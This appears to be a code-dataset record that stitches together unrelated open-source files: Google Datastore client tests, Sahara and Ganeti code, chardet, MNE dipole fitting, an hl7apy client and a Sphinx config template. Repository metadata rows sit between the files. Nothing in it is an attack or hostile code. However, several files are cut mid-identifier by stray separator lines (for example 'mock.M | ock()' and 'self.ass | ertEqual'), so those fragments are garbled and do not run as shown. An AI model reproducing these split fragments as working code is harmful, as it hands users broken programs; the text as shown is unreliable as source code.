_callers = []
def gcd_mock():
_callers.append("gcd_mock")
return gcd
def fallback_mock(project=None):
_callers.append(("fallback_mock", project))
return fallback
patch = mock.patch.multiple(
"google.cloud.datastore.client",
_get_gcd_project=gcd_mock,
_base_default_project=fallback_mock,
)
with patch:
returned_project = self._call_fut(project_called)
return returned_project, _callers
def test_no_value(self):
project, callers = self._determine_default_helper()
self.assertIsNone(project)
self.assertEqual(callers, ["gcd_mock", ("fallback_mock", None)])
def test_explicit(self):
PROJECT = object()
project, callers = self._determine_default_helper(project_called=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, [])
def test_gcd(self):
PROJECT = object()
project, callers = self._determine_default_helper(gcd=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ["gcd_mock"])
def test_fallback(self):
PROJECT = object()
project, callers = self._determine_default_helper(fallback=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ["gcd_mock", ("fallback_mock", None)])
class TestClient(unittest.TestCase):
PROJECT = "PROJECT"
@staticmethod
def _get_target_class():
from google.cloud.datastore.client import Client
return Client
def _make_one(
self,
project=PROJECT,
namespace=None,
credentials=None,
client_info=None,
client_options=None,
_http=None,
_use_grpc=None,
):
return self._get_target_class()(
project=project,
namespace=namespace,
credentials=credentials,
client_info=client_info,
client_options=client_options,
_http=_http,
_use_grpc=_use_grpc,
)
def test_constructor_w_project_no_environ(self):
# Some environments (e.g. AppVeyor CI) run in GCE, so
# this test would fail artificially.
patch = mock.patch(
"google.cloud.datastore.client._base_default_project", return_value=None
)
with patch:
self.assertRaises(EnvironmentError, self._make_one, None)
def test_constructor_w_implicit_inputs(self):
from google.cloud.datastore.client import _CLIENT_INFO
from google.cloud.datastore.client import _DATASTORE_BASE_URL
other = "other"
creds = _make_credentials()
klass = self._get_target_class()
patch1 = mock.patch(
"google.cloud.datastore.client._determine_default_project",
return_value=other,
)
patch2 = mock.patch("google.auth.default", return_value=(creds, None))
with patch1 as _determine_default_project:
with patch2 as default:
client = klass()
self.assertEqual(client.project, other)
self.assertIsNone(client.namespace)
self.assertIs(client._credentials, creds)
self.assertIs(client._client_info, _CLIENT_INFO)
self.assertIsNone(client._http_internal)
self.assertIsNone(client._client_options)
self.assertEqual(client.base_url, _DATASTORE_BASE_URL)
self.assertIsNone(client.current_batch)
self.assertIsNone(client.current_transaction)
default.assert_called_once_with()
_determine_default_project.assert_called_once_with(None)
def test_constructor_w_explicit_inputs(self):
from google.api_core.client_options import ClientOptions
other = "other"
namespace = "namespace"
creds = _make_credentials()
client_info = mock.M
|
ock()
client_options = ClientOptions("endpoint")
http = object()
client = self._make_one(
project=other,
namespace=namespace,
credentials=creds,
client_info=client_info,
client_options=client_options,
_http=http,
)
self.ass
|
ertEqual(client.project, other)
self.assertEqual(client.namespace, namespace)
self.assertIs(client._credentials, creds)
self.assertIs(client._client_info, client_info)
self.assertIs(client._http_internal, http)
self.assertIsNone(client.current_batch)
self.assertIs(client._base_url, "endpoint")
self.assertEqual(list(client._batch_stack), [])
def test_constructor_use_grpc_default(self):
import google.cloud.datastore.client as MUT
project = "PROJECT"
creds = _make_credentials()
http = object()
with mock.patch.object(MUT, "_USE_GRPC", new=True):
client1 = self._make_one(project=project, credentials=creds, _http=http)
self.assertTrue(client1._use_grpc)
# Explicitly over-ride the environment.
client2 = self._make_one(
project=project, credentials=creds, _http=http, _use_grpc=False
)
self.assertFalse(client2._use_grpc)
with mock.patch.object(MUT, "_USE_GRPC", new=False):
client3 = self._make_one(project=project, credentials=creds, _http=http)
self.assertFalse(client3._use_grpc)
# Explicitly over-ride the environment.
client4 = self._make_one(
project=project, credentials=creds, _http=http, _use_grpc=True
)
self.assertTrue(client4._use_grpc)
def test_constructor_gcd_host(self):
from google.cloud.environment_vars import GCD_HOST
host = "localhost:1234"
fake_environ = {GCD_HOST: host}
project
|
sostenibilidad-unam/sleuth_automation
|
bin/status.py
|
Python
|
gpl-3.0
| 373
| 0.005362
|
#!/usr/bin/env python
import pickle
import argparse
from pprint import pprint
description = """
print out run status from pickled Location object
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument('pickle', type=argparse.FileTyp
|
e('r'), help='path to location pickle')
args = parser.
|
parse_args()
l = pickle.load(args.pickle)
pprint(l)
|
tellesnobrega/storm_plugin
|
sahara/tests/unit/service/validation/edp/test_job_executor_java.py
|
Python
|
apache-2.0
| 2,252
| 0
|
# Copyright (c) 2013 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific la
|
nguage governing permissions and
# limitations under the License.
import uuid
import mock
import six
from sahara.service.validations.edp import job_executor as je
from sahara.tests.unit.service.validation import utils as u
from sahara.utils import edp
def wrap_it(data):
je.check_job_executor(data, 0)
clas
|
s FakeJob(object):
type = edp.JOB_TYPE_JAVA
libs = []
class TestJobExecJavaValidation(u.ValidationTestCase):
def setUp(self):
super(TestJobExecJavaValidation, self).setUp()
self._create_object_fun = wrap_it
self.scheme = je.JOB_EXEC_SCHEMA
@mock.patch('sahara.service.validations.base.check_edp_job_support')
@mock.patch('sahara.service.validations.base.check_cluster_exists')
@mock.patch('sahara.service.edp.api.get_job')
def test_java(self, get_job, check_cluster, check_oozie):
check_cluster.return_value = True
check_oozie.return_value = None
get_job.return_value = FakeJob()
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {"configs": {},
"params": {},
"args": []}
},
bad_req_i=(1, "INVALID_DATA",
"Java job must "
"specify edp.java.main_class"))
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {
"configs": {
"edp.java.main_class": "org.me.myclass"},
"params": {},
"args": []}
})
|
insiderr/insiderr-app
|
app/modules/requests/packages/chardet/mbcharsetprober.py
|
Python
|
gpl-3.0
| 3,269
| 0.000306
|
# ####################### BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingSt
|
ate == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
|
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
|
pelgoros/kwyjibo
|
revisions/urls.py
|
Python
|
gpl-3.0
| 232
| 0.017241
|
from django.conf.urls import url
from . import views
app_name = 'revisions'
urlpatterns = [
url(r'^revision/$', views.RevisionView.as_view
|
(), name = 'revisio
|
n'),
url(r'^mail/$', views.MailView.as_view(), name = 'mail'),
]
|
kambysese/mne-python
|
mne/dipole.py
|
Python
|
bsd-3-clause
| 57,802
| 0.000017
|
# -*- coding: utf-8 -*-
"""Single-dipole functions and classes."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Eric Larson <larson.eric.d@gmail.com>
#
# License: Simplified BSD
from copy import deepcopy
import functools
from functools import partial
import re
import numpy as np
from .cov import read_cov, compute_whitener
from .io.constants import FIFF
from .io.pick import pick_types
from .io.proj import make_projector, _needs_eeg_average_ref_proj
from .bem import _fit_sphere
from .evoked import _read_evoked, _aspect_rev, _write_evokeds
from .transforms import _print_coord_trans, _coord_frame_name, apply_trans
from .viz.evoked import _plot_evoked
from .forward._make_forward import (_get_trans, _setup_bem,
_prep_meg_channels, _prep_eeg_channels)
from .forward._compute_forward import (_compute_forwards_meeg,
_prep_field_computation)
from .surface import (transform_surface_to, _compute_nearest,
_points_outside_surface)
from .bem import _bem_find_surface, _bem_surf_name
from .source_space import _make_volume_source_space, SourceSpaces, head_to_mni
from .parallel import parallel_func
from .utils import (logger, verbose, _time_mask, warn, _check_fname,
check_fname, _pl, fill_doc, _check_option, ShiftTimeMixin,
_svd_lwork, _repeated_svd, _get_blas_funcs)
@fill_doc
class Dipole(object):
u"""Dipole class for sequential dipole fits.
.. note:: This class should usually not be instantiated directly,
instead :func:`mne.read_dipole` should be used.
Used to store positions, orientations, amplitudes, times, goodness of fit
of dipoles, typically obtained with Neuromag/xfit, mne_dipole_fit
or certain inverse solvers. Note that dipole position vectors are given in
the head coordinate frame.
Parameters
----------
times : array, shape (n_dipoles,)
The time instants at which each dipole was fitted (sec).
pos : array, shape (n_dipoles, 3)
The dipoles positions (m) in head coordinates.
amplitude : array, shape (n_dipoles,)
The amplitude of the dipoles (Am).
ori : array, shape (n_dipoles, 3)
The dipole orientations (normalized to unit length).
gof : array, shape (n_dipoles,)
The goodness of fit.
name : str | None
Name of the dipole.
conf : dict
Confidence limits in dipole orientation for "vol" in m^3 (volume),
"depth" in m (along the depth axis), "long" in m (longitudinal axis),
"trans" in m (transverse axis), "qlong" in Am, and "qtrans" in Am
(currents). The current confidence limit in the depth direction
|
is
assumed to be zero (although it can be non-zero when a BEM is us
|
ed).
.. versionadded:: 0.15
khi2 : array, shape (n_dipoles,)
The χ^2 values for the fits.
.. versionadded:: 0.15
nfree : array, shape (n_dipoles,)
The number of free parameters for each fit.
.. versionadded:: 0.15
%(verbose)s
See Also
--------
fit_dipole
DipoleFixed
read_dipole
Notes
-----
This class is for sequential dipole fits, where the position
changes as a function of time. For fixed dipole fits, where the
position is fixed as a function of time, use :class:`mne.DipoleFixed`.
"""
@verbose
def __init__(self, times, pos, amplitude, ori, gof,
name=None, conf=None, khi2=None, nfree=None,
verbose=None): # noqa: D102
self.times = np.array(times)
self.pos = np.array(pos)
self.amplitude = np.array(amplitude)
self.ori = np.array(ori)
self.gof = np.array(gof)
self.name = name
self.conf = dict()
if conf is not None:
for key, value in conf.items():
self.conf[key] = np.array(value)
self.khi2 = np.array(khi2) if khi2 is not None else None
self.nfree = np.array(nfree) if nfree is not None else None
self.verbose = verbose
def __repr__(self): # noqa: D105
s = "n_times : %s" % len(self.times)
s += ", tmin : %0.3f" % np.min(self.times)
s += ", tmax : %0.3f" % np.max(self.times)
return "<Dipole | %s>" % s
@verbose
def save(self, fname, overwrite=False, *, verbose=None):
"""Save dipole in a .dip or .bdip file.
Parameters
----------
fname : str
The name of the .dip or .bdip file.
%(overwrite)s
.. versionadded:: 0.20
%(verbose_meth)s
Notes
-----
.. versionchanged:: 0.20
Support for writing bdip (Xfit binary) files.
"""
# obligatory fields
fname = _check_fname(fname, overwrite=overwrite)
if fname.endswith('.bdip'):
_write_dipole_bdip(fname, self)
else:
_write_dipole_text(fname, self)
@fill_doc
def crop(self, tmin=None, tmax=None, include_tmax=True):
"""Crop data to a given time interval.
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
%(include_tmax)s
Returns
-------
self : instance of Dipole
The cropped instance.
"""
sfreq = None
if len(self.times) > 1:
sfreq = 1. / np.median(np.diff(self.times))
mask = _time_mask(self.times, tmin, tmax, sfreq=sfreq,
include_tmax=include_tmax)
for attr in ('times', 'pos', 'gof', 'amplitude', 'ori',
'khi2', 'nfree'):
if getattr(self, attr) is not None:
setattr(self, attr, getattr(self, attr)[mask])
for key in self.conf.keys():
self.conf[key] = self.conf[key][mask]
return self
def copy(self):
"""Copy the Dipoles object.
Returns
-------
dip : instance of Dipole
The copied dipole instance.
"""
return deepcopy(self)
@verbose
def plot_locations(self, trans, subject, subjects_dir=None,
mode='orthoview', coord_frame='mri', idx='gof',
show_all=True, ax=None, block=False, show=True,
scale=5e-3, color=(1.0, 0.0, 0.0), fig=None,
verbose=None, title=None):
"""Plot dipole locations in 3d.
Parameters
----------
trans : dict
The mri to head trans.
subject : str
The subject name corresponding to FreeSurfer environment
variable SUBJECT.
%(subjects_dir)s
mode : str
Can be ``'arrow'``, ``'sphere'`` or ``'orthoview'``.
.. versionadded:: 0.14.0
coord_frame : str
Coordinate frame to use, 'head' or 'mri'. Defaults to 'mri'.
.. versionadded:: 0.14.0
idx : int | 'gof' | 'amplitude'
Index of the initially plotted dipole. Can also be 'gof' to plot
the dipole with highest goodness of fit value or 'amplitude' to
plot the dipole with the highest amplitude. The dipoles can also be
browsed through using up/down arrow keys or mouse scroll. Defaults
to 'gof'. Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
show_all : bool
Whether to always plot all the dipoles. If True (default), the
active dipole is plotted as a red dot and its location determines
the shown MRI slices. The non-active dipoles are plotted as
small blue dots. If False, only the active dipole is plotted.
Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
ax : instance of matplotlib Axes3D | None
Axes to plot into. If None (default), axes will be created.
Only used if mode equals 'orthoview'.
.. versionadded:: 0.14.0
block : bool
|
crs4/hl7apy
|
examples/iti_21/client.py
|
Python
|
mit
| 1,870
| 0.004813
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012-2018, CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import socket
from hl7apy.parser import parse_message
def query(host, port):
msg = \
'MSH|^~\&|REC APP|REC FAC|SEND APP|SEND FAC|20110708163513||QBP^Q22^QBP_Q21|111069|D|2.5|||||ITA||EN\r' \
'QPD|IHE PDQ Query|111069|@PID.5.2^SMITH||||\r' \
'RCP|I|'
# establish th
|
e connection
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
# send the message
sock.sendall(parse_message(msg).to_mllp().encode('UTF-8'))
# receive the answer
received = sock.recv(1024*1024)
return r
|
eceived
finally:
sock.close()
if __name__ == '__main__':
res = query('localhost', 6789)
print("Received response: ")
print(repr(res))
|
badp/ganeti
|
lib/cmdlib/instance_operation.py
|
Python
|
gpl-2.0
| 17,072
| 0.007908
|
#
#
# Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Logical units dealing with instance operations (start/stop/...).
Those operations have in common that they affect the operating system in a
running instance directly.
"""
import logging
from ganeti import constants
from ganeti import errors
from ganeti import hypervisor
from ganeti import locking
from ganeti import objects
from ganeti import utils
from ganeti.cmdlib.base import LogicalUnit, NoHooksLU
from ganeti.cmdlib.common import INSTANCE_ONLINE, INSTANCE_DOWN, \
CheckHVParams, CheckInstanceState, CheckNodeOnline, GetUpdatedParams, \
CheckOSParams, ShareAll
from ganeti.cmdlib.instance_storage import StartInstanceDisks, \
ShutdownInstanceDisks
from ganeti.cmdlib.instance_utils import BuildInstanceHookEnvByObject, \
CheckInstanceBridgesExist, CheckNodeFreeMemory, CheckNodeHasOS
from ganeti.hypervisor import hv_base
class LUInstanceStartup(LogicalUnit):
"""Starts an instance.
"""
HPATH = "instance-start"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def CheckArguments(self):
# extra beparams
if self.op.beparams:
# fill the beparams dict
objects.UpgradeBeParams(self.op.beparams)
utils.ForceDictType(self.op.beparams, constants.BES_PARAMETER_TYPES)
def ExpandNames(self):
self._ExpandAndLockInstance()
self.recalculate_locks[locking.LEVEL_NODE_RES] = constants.LOCKS_REPLACE
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE_RES:
self._LockInstancesNodes(primary_only=True, level=locking.LEVEL_NODE_RES)
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = {
"FORCE": self.op.force,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
cluster = self.cfg.GetClusterInfo()
# extra hvparams
if self.op.hvparams:
# check hypervisor parameter syntax (locally)
utils.ForceDictType(self.op.hvparams, constants.HVS_PARAMETER_TYPES)
filled_hvp = cluster.FillHV(self.instance)
filled_hvp.update(self.op.hvparams)
hv_type = hypervisor.GetHypervisorClass(self.instance.hypervisor)
hv_type.CheckParameterSyntax(filled_hvp)
CheckHVParams(self, self.instance.all_nodes, self.instance.hypervisor,
filled_hvp)
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
if self.op.hvparams or self.op.beparams:
self.LogWarning("Overridden parameters are ignored")
else:
|
CheckNodeOnline(self, self.instance.primary_node)
bep = self.cfg.GetClusterInfo().FillBE(self.instance)
bep.update(self.op.beparams)
# check bridges existence
CheckInstanceBridgesExi
|
st(self, self.instance)
remote_info = self.rpc.call_instance_info(
self.instance.primary_node, self.instance.name,
self.instance.hypervisor, cluster.hvparams[self.instance.hypervisor])
remote_info.Raise("Error checking node %s" %
self.cfg.GetNodeName(self.instance.primary_node),
prereq=True, ecode=errors.ECODE_ENVIRON)
if remote_info.payload:
if hv_base.HvInstanceState.IsShutdown(remote_info.payload["state"]):
raise errors.OpPrereqError("Instance '%s' was shutdown by the user,"
" please shutdown the instance before"
" starting it again" % self.instance.name,
errors.ECODE_INVAL)
else: # not running already
CheckNodeFreeMemory(
self, self.instance.primary_node,
"starting instance %s" % self.instance.name,
bep[constants.BE_MINMEM], self.instance.hypervisor,
self.cfg.GetClusterInfo().hvparams[self.instance.hypervisor])
def Exec(self, feedback_fn):
"""Start the instance.
"""
if not self.op.no_remember:
self.cfg.MarkInstanceUp(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as started")
else:
StartInstanceDisks(self, self.instance, self.op.force)
result = \
self.rpc.call_instance_start(self.instance.primary_node,
(self.instance, self.op.hvparams,
self.op.beparams),
self.op.startup_paused, self.op.reason)
msg = result.fail_msg
if msg:
ShutdownInstanceDisks(self, self.instance)
raise errors.OpExecError("Could not start instance: %s" % msg)
class LUInstanceShutdown(LogicalUnit):
"""Shutdown an instance.
"""
HPATH = "instance-stop"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
env = BuildInstanceHookEnvByObject(self, self.instance)
env["TIMEOUT"] = self.op.timeout
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + list(self.instance.all_nodes)
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
if not self.op.force:
CheckInstanceState(self, self.instance, INSTANCE_ONLINE)
else:
self.LogWarning("Ignoring offline instance check")
self.primary_offline = \
self.cfg.GetNodeInfo(self.instance.primary_node).offline
if self.primary_offline and self.op.ignore_offline_nodes:
self.LogWarning("Ignoring offline primary node")
else:
CheckNodeOnline(self, self.instance.primary_node)
def Exec(self, feedback_fn):
"""Shutdown the instance.
"""
# If the instance is offline we shouldn't mark it as down, as that
# resets the offline flag.
if not self.op.no_remember and self.instance.admin_state in INSTANCE_ONLINE:
self.cfg.MarkInstanceDown(self.instance.uuid)
if self.primary_offline:
assert self.op.ignore_offline_nodes
self.LogInfo("Primary node offline, marked instance as stopped")
else:
result = self.rpc.call_instance_shutdown(
self.instance.primary_node,
self.instance,
self.op.timeout, self.op.reason)
msg = result.fail_msg
if msg:
self.LogWarning("Could not shutdown instance: %s", msg)
ShutdownInstanceDisks(self, self.instance)
cl
pezia/poker-croupier | player/py/lib/api/player_strategy/__init__.py | Python | gpl-2.0 | 52 | 0
__all__ = ['ttypes', 'constants', 'PlayerStrategy']
verpoorten/immobilier | main/forms/suivi.py | Python | agpl-3.0 | 3,478 | 0.004037
##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django import forms
from main import models as mdl
from main.forms.utils.datefield import DatePickerInput, DATE_FORMAT
from main.models.enums import etat_suivi as etat_suivi_enum
READONLY_ATTR = "disabled"
class SuiviForm(forms.ModelForm):
# date_paiement = forms.HiddenInput()
# financement_location = forms.HiddenInput()
date_paiement_reel = forms.DateField(widget=DatePickerInput(format=DATE_FORMAT),
input_formats=[DATE_FORMAT, ],
required=False)
class Meta:
model = mdl.suivi_loyer.SuiviLoyer
fields = ['date_paiement', 'financement_location', 'etat_suivi', 'remarque', 'loyer_percu', 'charges_percu',
'date_paiement_reel']
def __init__(self, *args, **kwargs):
super(SuiviForm, self).__init__(*args, **kwargs)
self.fields['date_paiement'].widget = forms.HiddenInput()
self.fields['financement_location'].widget = forms.HiddenInput()
self.fields['date_paiement_reel'].help_text = '(Double clic = date du jour)'
if self.instance:
self.fields['loyer_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.loyer)
self.fields['charges_percu'].help_text = '(Montant attendu : {})'.format(self.instance.financement_location.charges)
def clean(self):
self.validate_dates()
self.validate_status()
def validate_status(self):
if self.cleaned_data.get("etat_suivi") == etat_suivi_enum.PAYE and \
(self.cleaned_data.get("loyer_percu") is None or self.cleaned_data.get("loyer_percu") == 0) and \
(self.cleaned_data.get("charges_percu") is None or self.cleaned_data.get("charges_percu") == 0):
msg = u"L'état ne peut pas être à 'PAYE' si aucun montant n'est introduit pour les loyer/charge percue(s)"
self._errors["etat_suivi"] = self.error_class([msg])
def validate_dates(self):
date_paiement = self.cleaned_data.get("date_paiement")
date_paiement_reel = self.cleaned_data.get("date_paiement_reel")
if date_paiement_reel and date_paiement and date_paiement_reel < date_paiement:
msg = u"La date réelle de paiement doit être supérieure ou égale à la date supposée du paiement"
self._errors["date_paiement_reel"] = self.error_class([msg])
creasyw/IMTAphy | documentation/doctools/tags/0.4.2/sphinx/quickstart.py | Python | gpl-2.0 | 15,064 | 0.001062
# -*- coding: utf-8 -*-
"""
sphinx.quickstart
~~~~~~~~~~~~~~~~~
Quickly setup documentation source to work with Sphinx.
:copyright: 2008 by Georg Brandl.
:license: BSD.
"""
import sys, os, time
from os import path
from sphinx.util import make_filename
from sphinx.util.console import purple, bold, red, nocolor
PROMPT_PREFIX = '> '
QUICKSTART_CONF = '''\
# -*- coding: utf-8 -*-
#
# %(project)s documentation build configuration file, created by
# sphinx-quickstart on %(now)s.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys, os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [%(extensions)s]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['%(dot)stemplates']
# The suffix of source filenames.
source_suffix = '%(suffix)s'
# The master toctree document.
master_doc = '%(master)s'
# General substitutions.
project = %(project)r
copyright = '%(year)s, %(author)s'
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = '%(version)s'
# The full version, including alpha/beta/rc tags.
release = '%(release)s'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%%B %%d, %%Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be searched
# for source files.
#exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'default.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['%(dot)sstatic']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%%b %%d, %%Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = '%(project_fn)sdoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
